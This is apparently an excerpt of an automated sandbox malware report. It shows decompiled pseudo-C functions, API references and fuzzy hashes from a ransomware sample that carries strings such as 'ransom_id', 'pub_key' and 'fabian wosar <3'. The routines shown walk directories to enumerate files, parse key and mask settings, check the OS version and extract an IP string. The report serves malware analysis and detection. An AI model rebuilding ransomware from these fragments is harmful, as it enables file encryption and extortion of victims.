                                      				 *(__ecx + 0x64) = L"ransom_id";
                                      				 *((intOrPtr*)(__ecx + 0x78)) = L"hdd";
                                      				 *((intOrPtr*)(__ecx + 0x80)) = _a84;
                                      				 *(__ecx + 0x88) = L"ip";
                                      				 *((intOrPtr*)(_t44 + 0x8c)) = GetProcessHeap();
                                      				return _t44;
                                      			}




                                      0x004039b7
                                      0x004039b9
                                      0x004039be
                                      0x004039c4
                                      0x004039ca
                                      0x004039d0
                                      0x004039d6
                                      0x004039dc
                                      0x004039e2
                                      0x004039e8
                                      0x004039ef
                                      0x004039f6
                                      0x004039fd
                                      0x00403a04
                                      0x00403a0b
                                      0x00403a12
                                      0x00403a19
                                      0x00403a20
                                      0x00403a27
                                      0x00403a2e
                                      0x00403a35
                                      0x00403a3c
                                      0x00403a42
                                      0x00403a52
                                      0x00403a5c

                                      APIs
                                      • GetProcessHeap.KERNEL32(?,?,00404587,00000000,?,00000000), ref: 00403A4C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: HeapProcess
                                      • String ID: 0@$@@$T@$d@$t@$|@
                                      • API String ID: 54951025-2847450446
                                      • Opcode ID: 9fc73a0d6419aa769ded072bd8f0af5eaef3b33f8b2fda6b5b6c05d8156f3e3f
                                      • Instruction ID: 81848ed92efb6c47f2188ed1792c8f7cddf9ec8f0008dcc1071cc611d3409556
                                      • Opcode Fuzzy Hash: 9fc73a0d6419aa769ded072bd8f0af5eaef3b33f8b2fda6b5b6c05d8156f3e3f
                                      • Instruction Fuzzy Hash: D5114EB4501B448FC7A0CF6AC58468ABFF0BB08718B409D2EE99A97B50D3B5B458CF44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 94%
                                      			E00406769() {
                                      				intOrPtr* _t34;
                                      				intOrPtr* _t38;
                                      				void* _t40;
                                      				WCHAR* _t46;
                                      				void* _t51;
                                      
                                      				do {
                                      					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
                                      						lstrcatW(_t46, _t51 - 0x238);
                                      						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
                                      							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
                                      							 *_t38 =  *_t38 + E004063B0(_t46, _t51 - 0x264, _t40,  *((intOrPtr*)(_t51 + 8)));
                                      							asm("adc [ebx+0x4], edx");
                                      							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
                                      							if(__eflags <= 0) {
                                      								if(__eflags < 0) {
                                      									L8:
                                      									_t34 =  *((intOrPtr*)(_t51 + 0xc));
                                      									 *_t34 =  *_t34 + 1;
                                      									__eflags =  *_t34;
                                      								} else {
                                      									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
                                      									if( *((intOrPtr*)(_t51 - 0xc)) <  *_t38) {
                                      										goto L8;
                                      									}
                                      								}
                                      							}
                                      						} else {
                                      							E004066F0(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
                                      						}
                                      						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
                                      					}
                                      				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
                                      				FindClose( *(_t51 - 8));
                                      				return 0;
                                      			}








                                      0x00406770
                                      0x00406784
                                      0x004067a8
                                      0x004067b1
                                      0x004067e2
                                      0x004067ed
                                      0x004067ef
                                      0x004067f2
                                      0x004067f5
                                      0x004067f7
                                      0x00406800
                                      0x00406800
                                      0x00406803
                                      0x00406803
                                      0x004067f9
                                      0x004067fc
                                      0x004067fe
                                      0x00000000
                                      0x00000000
                                      0x004067fe
                                      0x004067f7
                                      0x004067b3
                                      0x004067c7
                                      0x004067cc
                                      0x00406810
                                      0x00406810
                                      0x00406823
                                      0x0040682e
                                      0x0040683c

                                      APIs
                                      • lstrcmpW.KERNEL32(?,00410368,?,?), ref: 0040677C
                                      • lstrcmpW.KERNEL32(?,0041036C,?,?), ref: 00406796
                                      • lstrcatW.KERNEL32(00000000,?), ref: 004067A8
                                      • lstrcatW.KERNEL32(00000000,0041039C), ref: 004067B9
                                        • Part of subcall function 004066F0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 00406723
                                        • Part of subcall function 004066F0: lstrcatW.KERNEL32(00000000,00410364), ref: 0040673B
                                        • Part of subcall function 004066F0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00406745
                                      • FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0040681D
                                      • FindClose.KERNEL32(00003000,?,?), ref: 0040682E
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 2032009209-0
                                      • Opcode ID: 2681e2e019e2eb95221ac8e5d6fef7f6142544138e274b8588e706dd0773f05b
                                      • Instruction ID: 9b87114a5c2e2fa11aec6284b95cd243dd4daa46cd42d80c1a26711d7dff17e5
                                      • Opcode Fuzzy Hash: 2681e2e019e2eb95221ac8e5d6fef7f6142544138e274b8588e706dd0773f05b
                                      • Instruction Fuzzy Hash: 6F012D31A0021DABDF21AB60DC48BEE7BB8EF44704F0444B6F806E61A1D7798A91CB65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00403190(char _a4) {
                                      				char _t6;
                                      				CHAR* _t13;
                                      				CHAR* _t16;
                                      
                                      				_t1 =  &_a4; // 0x405135
                                      				_t13 =  *_t1;
                                      				_t16 = _t13;
                                      				if( *_t13 == 0) {
                                      					L5:
                                      					lstrcmpiA(_t13, "mask");
                                      					_t2 =  &_a4; // 0x405135
                                      					_t10 =  ==  ? 1 : 0;
                                      					lstrcmpiA( *_t2, "pub_key");
                                      					 *_t16 = 0x3d;
                                      					_t11 =  ==  ? 2 :  ==  ? 1 : 0;
                                      					_t5 =  ==  ? 2 :  ==  ? 1 : 0;
                                      					return  ==  ? 2 :  ==  ? 1 : 0;
                                      				} else {
                                      					while(1) {
                                      						_t6 =  *_t16;
                                      						if(_t6 == 0x7d) {
                                      							break;
                                      						}
                                      						if(_t6 == 0x3d) {
                                      							 *_t16 = 0;
                                      							goto L5;
                                      						} else {
                                      							_t16 =  &(_t16[1]);
                                      							if( *_t16 != 0) {
                                      								continue;
                                      							} else {
                                      								goto L5;
                                      							}
                                      						}
                                      						goto L8;
                                      					}
                                      					return 0;
                                      				}
                                      				L8:
                                      			}






                                      0x00403193
                                      0x00403193
                                      0x00403197
                                      0x0040319c
                                      0x004031b0
                                      0x004031b9
                                      0x004031c4
                                      0x004031ce
                                      0x004031d1
                                      0x004031d9
                                      0x004031e1
                                      0x004031e4
                                      0x004031e9
                                      0x004031a0
                                      0x004031a0
                                      0x004031a0
                                      0x004031a4
                                      0x00000000
                                      0x00000000
                                      0x004031a8
                                      0x004031ec
                                      0x00000000
                                      0x004031aa
                                      0x004031aa
                                      0x004031ae
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004031ae
                                      0x00000000
                                      0x004031a8
                                      0x004031f5
                                      0x004031f5
                                      0x00000000

                                      APIs
                                      • lstrcmpiA.KERNEL32(5Q@,mask,5Q@,?,?,00403441,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 004031B9
                                      • lstrcmpiA.KERNEL32(5Q@,pub_key,?,00403441,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 004031D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcmpi
                                      • String ID: 5Q@$5Q@$mask$pub_key
                                      • API String ID: 1586166983-363831109
                                      • Opcode ID: bb2af6430398937933059d9a79bd65117c4dfe7bbf55f0997fe80ddbfe01824b
                                      • Instruction ID: 77421031a41d7d6ff0c7d7d831153f50eac579c1ccc453c74b5f930fdf35060a
                                      • Opcode Fuzzy Hash: bb2af6430398937933059d9a79bd65117c4dfe7bbf55f0997fe80ddbfe01824b
                                      • Instruction Fuzzy Hash: 09F0F6713082845EF7194E689C41BA3BFCD9B59311F5805BFE689E62D1C6BD8D81839C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _memset.LIBCMT ref: 00403B32
                                      • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 00403B56
                                      • VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 00403B5A
                                      • VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 00403B5E
                                      • VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00403B85
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ConditionMask$InfoVerifyVersion_memset
                                      • String ID:
                                      • API String ID: 3299124433-0
                                      • Opcode ID: 7cde68c66f9c015681154b08be74a03bb432d34b9aa19d53ad58b75a9a878dd1
                                      • Instruction ID: 675139515f83daa62978cf2687ed4dcf32745b37c88ce0392e5ff862a27301cc
                                      • Opcode Fuzzy Hash: 7cde68c66f9c015681154b08be74a03bb432d34b9aa19d53ad58b75a9a878dd1
                                      • Instruction Fuzzy Hash: 83111EB0D4031C6EEB609B65DC0ABEA7ABCEF08704F008199A548F61C1D6B95B948FD5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 97%
                                      			E00404BA0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
                                      				CHAR* _v8;
                                      				char _v12;
                                      				char _v20;
                                      				char _t16;
                                      				char _t20;
                                      				char _t21;
                                      				intOrPtr* _t24;
                                      				intOrPtr _t25;
                                      				intOrPtr _t26;
                                      				intOrPtr* _t29;
                                      				CHAR* _t33;
                                      				intOrPtr _t34;
                                      				intOrPtr _t35;
                                      				void* _t38;
                                      				void* _t41;
                                      				intOrPtr* _t42;
                                      				void* _t47;
                                      				void* _t49;
                                      				intOrPtr* _t51;
                                      				CHAR* _t53;
                                      
                                      				asm("movq xmm0, [0x40ff2c]");
                                      				_t16 =  *0x40ff34; // 0x0
                                      				_t29 = _a4;
                                      				_v8 = __edx;
                                      				_t51 = __ecx;
                                      				asm("movq [ebp-0x10], xmm0");
                                      				_v12 = _t16;
                                      				if( *_t29 == 0) {
                                      					L11:
                                      					if(_t51 == 0) {
                                      						goto L10;
                                      					} else {
                                      						if(_v20 == 0) {
                                      							L22:
                                      							if(_t51 == 0) {
                                      								goto L10;
                                      							} else {
                                      								_t53 = _t51 + lstrlenA( &_v20);
                                      								while(1) {
                                      									_t20 =  *_t53;
                                      									if(_t20 >= 0x30 && _t20 <= 0x39) {
                                      										break;
                                      									}
                                      									_t53 =  &(_t53[1]);
                                      								}
                                      								_t33 = _t53;
                                      								while(1) {
                                      									_t21 =  *_t33;
                                      									if(_t21 < 0x30 || _t21 > 0x39) {
                                      										goto L30;
                                      									}
                                      									L31:
                                      									_t33 =  &(_t33[1]);
                                      									continue;
                                      									L30:
                                      									if(_t21 == 0x2e) {
                                      										goto L31;
                                      									}
                                      									 *_t33 = 0;
                                      									return lstrcpyA(_v8, _t53);
                                      									goto L33;
                                      								}
                                      							}
                                      						} else {
                                      							_t34 =  *_t51;
                                      							if(_t34 != 0) {
                                      								_t47 = _t51 -  &_v20;
                                      								do {
                                      									_t24 =  &_v20;
                                      									if(_t34 == 0) {
                                      										L19:
                                      										if( *_t24 == 0) {
                                      											goto L22;
                                      										} else {
                                      											goto L20;
                                      										}
                                      									} else {
                                      										while(1) {
                                      											_t35 =  *_t24;
                                      											if(_t35 == 0) {
                                      												goto L22;
                                      											}
                                      											_t41 =  *((char*)(_t47 + _t24)) - _t35;
                                      											if(_t41 != 0) {
                                      												goto L19;
                                      											} else {
                                      												_t24 = _t24 + 1;
                                      												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
                                      													continue;
                                      												} else {
                                      													goto L19;
                                      												}
                                      											}
                                      											goto L33;
                                      										}
                                      										goto L22;
                                      									}
                                      									goto L33;
                                      									L20:
                                      									_t34 =  *((intOrPtr*)(_t51 + 1));
                                      									_t51 = _t51 + 1;
                                      									_t47 = _t47 + 1;
                                      								} while (_t34 != 0);
                                      							}
                                      							goto L10;
                                      						}
                                      					}
                                      				} else {
                                      					_t25 =  *__ecx;
                                      					if(_t25 == 0) {
                                      						L10:
                                      						return lstrcpyA(_v8, "fabian wosar <3");
                                      					} else {
                                      						_t49 = __ecx - _t29;
                                      						do {
                                      							_t42 = _t29;
                                      							if(_t25 == 0) {
                                      								L8:
                                      								if( *_t42 == 0) {
                                      									goto L11;
                                      								} else {
                                      									goto L9;
                                      								}
                                      							} else {
                                      								while(1) {
                                      									_t26 =  *_t42;
                                      									if(_t26 == 0) {
                                      										goto L11;
                                      									}
                                      									_t38 =  *((char*)(_t49 + _t42)) - _t26;
                                      									if(_t38 != 0) {
                                      										goto L8;
                                      									} else {
                                      										_t42 = _t42 + 1;
                                      										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
                                      											continue;
                                      										} else {
                                      											goto L8;
                                      										}
                                      									}
                                      									goto L33;
                                      								}
                                      								goto L11;
                                      							}
                                      							goto L33;
                                      							L9:
                                      							_t25 =  *((intOrPtr*)(_t51 + 1));
                                      							_t51 = _t51 + 1;
                                      							_t49 = _t49 + 1;
                                      						} while (_t25 != 0);
                                      						goto L10;
                                      					}
                                      				}
                                      				L33:
                                      			}























                                      0x00404ba6
                                      0x00404bae
                                      0x00404bb4
                                      0x00404bb9
                                      0x00404bbc
                                      0x00404bc1
                                      0x00404bc6
                                      0x00404bc9
                                      0x00404c1a
                                      0x00404c1c
                                      0x00000000
                                      0x00404c1e
                                      0x00404c22
                                      0x00404c5f
                                      0x00404c61
                                      0x00000000
                                      0x00404c63
                                      0x00404c6d
                                      0x00404c70
                                      0x00404c70
                                      0x00404c74
                                      0x00000000
                                      0x00000000
                                      0x00404c7a
                                      0x00404c7a
                                      0x00404c7d
                                      0x00404c80
                                      0x00404c80
                                      0x00404c84
                                      0x00000000
                                      0x00000000
                                      0x00404c8e
                                      0x00404c8e
                                      0x00000000
                                      0x00404c8a
                                      0x00404c8c
                                      0x00000000
                                      0x00000000
                                      0x00404c95
                                      0x00404ca4
                                      0x00000000
                                      0x00404ca4
                                      0x00404c80
                                      0x00404c24
                                      0x00404c24
                                      0x00404c28
                                      0x00404c2f
                                      0x00404c31
                                      0x00404c31
                                      0x00404c36
                                      0x00404c4f
                                      0x00404c52
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404c38
                                      0x00404c38
                                      0x00404c38
                                      0x00404c3c
                                      0x00000000
                                      0x00000000
                                      0x00404c45
                                      0x00404c47
                                      0x00000000
                                      0x00404c49
                                      0x00404c49
                                      0x00404c4d
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404c4d
                                      0x00000000
                                      0x00404c47
                                      0x00000000
                                      0x00404c38
                                      0x00000000
                                      0x00404c54
                                      0x00404c54
                                      0x00404c57
                                      0x00404c58
                                      0x00404c59
                                      0x00404c5d
                                      0x00000000
                                      0x00404c28
                                      0x00404c22
                                      0x00404bcb
                                      0x00404bcb
                                      0x00404bcf
                                      0x00404c05
                                      0x00404c19
                                      0x00404bd1
                                      0x00404bd3
                                      0x00404bd5
                                      0x00404bd5
                                      0x00404bd9
                                      0x00404bf7
                                      0x00404bfa
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404bdb
                                      0x00404be0
                                      0x00404be0
                                      0x00404be4
                                      0x00000000
                                      0x00000000
                                      0x00404bed
                                      0x00404bef
                                      0x00000000
                                      0x00404bf1
                                      0x00404bf1
                                      0x00404bf5
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404bf5
                                      0x00000000
                                      0x00404bef
                                      0x00000000
                                      0x00404be0
                                      0x00000000
                                      0x00404bfc
                                      0x00404bfc
                                      0x00404bff
                                      0x00404c00
                                      0x00404c01
                                      0x00000000
                                      0x00404bd5
                                      0x00404bcf
                                      0x00000000

                                      APIs
                                      • lstrcpyA.KERNEL32(?,fabian wosar <3,?,00404E7E), ref: 00404C0D
                                      • lstrlenA.KERNEL32(00000000,?,00404E7E), ref: 00404C67
                                      • lstrcpyA.KERNEL32(?,?,?,00404E7E), ref: 00404C98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen
                                      • String ID: fabian wosar <3
                                      • API String ID: 367037083-1724090804
                                      • Opcode ID: a904c25ae265fe742736e648722e0dad384a46136875b74b9355d29ccf0e1a05
                                      • Instruction ID: 61f71b58efb5150348b69fdc6af893256ae21e9068894ab04c691d9c03621922
                                      • Opcode Fuzzy Hash: a904c25ae265fe742736e648722e0dad384a46136875b74b9355d29ccf0e1a05
                                      • Instruction Fuzzy Hash: CE3128A180E1955BEB328E6844143BBBFA19FC3301F1A01BBCAD1B7386D2394C46C798
                                      Uniqueness

                                      Uniqueness Score: -1.00%